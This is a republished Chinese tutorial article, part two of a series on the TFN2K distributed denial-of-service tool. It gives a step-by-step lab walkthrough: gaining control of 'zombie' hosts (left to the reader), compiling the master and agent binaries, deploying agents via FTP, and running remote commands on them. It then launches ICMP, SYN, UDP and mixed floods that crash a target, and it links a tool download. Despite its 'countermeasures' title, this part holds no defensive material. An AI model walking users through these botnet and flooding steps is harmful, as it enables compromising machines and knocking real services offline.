tfn2k使用方法和對策(2)
發(fā)布日期:2021-12-24 00:19 | 文章來源:站長之家
tfn2k使用方法和對策(2) 作者:佳佳 佳佳繼續(xù)上一次的文章,這一次是攻擊測試。 測試環(huán)境: 共有5臺機器,佳佳是在五臺redhat linux6.2上測試的。 192.168.111.1 192.168.111.2 192.168.111.3 192.168.111.55 192.168.111.88 測試目的:?????(感受一下yahoo怎么被攻擊的) 簡要介紹: 我們的測試目的是用192.168.111.55指揮192.168.111.1,192.168.111.2,192.168.111.3 三臺機器對192.168.111.88發(fā)動攻擊。(實際攻擊中就不止三臺了。) 因此我們的步驟如下: 0。黑客攻擊時事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55這四臺機器。也就是我們俗稱的“肉雞”。 1。編譯代碼。 2。在192.168.111.1,192.168.111.2,192.168.111.3上安裝td。 3。在192.168.111.55安裝tfn。 4。由192.168.111.55指揮192.168.111.1,192.168.111.2,192.168.111.3 對192.168.111.88發(fā)動攻擊。 5。攻擊結(jié)束。 詳細步驟: 0。黑客攻擊時事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55這四臺機器?!? 這一步我就不說了,大家一定有辦法。。。 1。編譯代碼。 假設(shè)在192.168.112.55上。。。 首先一定要有root權(quán)限 $su # 解開文件: #tar zxvf tfn2k.tgz #cd tfn2k 如果你不是linux或者bsd請修改src下的Makefile文件。(有一網(wǎng)友問佳佳,solaris為什么不行。如果你修改了Makefile,把linux改成了solaris仍然不行,佳佳也不知道了,因為佳佳沒有solaris的測試環(huán)境。) #make make過程中會讓你輸入一個密碼,8--32位的。那就輸入一個吧,將來tfn和td聯(lián)系時需要這個密碼。我輸入的是:aaaabbbb make完成你會發(fā)現(xiàn),多了兩個可執(zhí)行文件:tfn,td 2。在192.168.111.1,192.168.111.2,192.168.111.3上安裝td。 #ftp 192.168.111.1 ftp>bin fpt>put td ftp>by ftp的具體步驟我就不說了,大家一定都知道。 同樣方法:ftp 192.168.111.2 ftp 192.168.111.3 然后在分別在192.168.111.1,192.168.111.2,192.168.111.3上 #./td 注意一定要有root權(quán)限,否則無法運行。 3。在192.168.111.55安裝tfn。 由于我們是在192.168.111.55上編譯的,tfn就已經(jīng)在了。 4。由192.168.111.55指揮192.168.111.1,192.168.111.2,192.168.111.3對192.168.111.88發(fā)動攻擊。 好了,我們終于完成了準備工作,攻擊可以開始了。。。 我現(xiàn)在在192.168.111.55的/tfn2k/目錄下。。。 我們需要編輯一個文件列表。 #vi hosts.txt 文件第一行輸入:192.168.111.1 文件第二行輸入:192.168.111.2 文件第三行輸入:192.168.111.3 這就是控制文件列表。 然后我們測試一下連接。 在192.168.111.55上。。。 下面的命令意思是:在hosts.txt文件中的機器上執(zhí)行遠程命令“mkdir jjgirl”,其中-c 10表示執(zhí)行遠程命令。執(zhí)行完這個命令就會在那三臺機器上都建立jjgirl目錄。當然你可以隨便執(zhí)行其他的命令。 #./tfn -f hosts.txt -c 10 -i "mkdir jjgirl" Protocol : random Source IP : random Client input : list Command : execute remote command Password verification:?。ㄟ@時我們輸入密碼:aaaabbbb) Sending out packets: . 好了,完成。 然后我們在192.168.111.1上執(zhí)行: #find / -name jjgirl -print 好,找到了。說明我們連接成功。。。 下面開始正式攻擊了。。。 你可以在192.168.111.1上: #./ntop 運行ntop查看流量。 先來ICMP攻擊 #./tfn -f hosts.txt -c 6 -i 192.168.111.88(十分鐘,192.168.111.88就死機了) 重啟,接著測試。。。 SYN/TCP攻擊: #./tfn -f hosts.txt -c 5 -i 192.168.111.88 -p 80 UDP攻擊: #./tfn -f hosts.txt -c 4 -i 192.168.111.88 ICMP/TCP/UDP輪流攻擊: #./tfn -f hosts.txt -c 8 -i 192.168.111.88 5。攻擊結(jié)束 如果我們想停止攻擊: #./tfn -f host.txt -c 0 實際tfn還有許多攻擊選項,大家可以再回頭看我的第一篇文章,看一下-c后面的11個選項。 整個測試結(jié)束。由于我是在局域網(wǎng)測試速度比較快。實際對yahoo等攻擊時至少有幾十臺機器吧。 好了,下一篇文章主要分析tfn的源代碼,有興趣的同學接著等。。。 jjgirl 10.29.2000 jjgirl@363.net http://jjgirl.yeah.net 下載地址: http://darknet.evilnerds.org/dos/ddos/tfn2k.tgz
版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章
上一篇:
tfn2k使用方法和對策(3)
下一篇: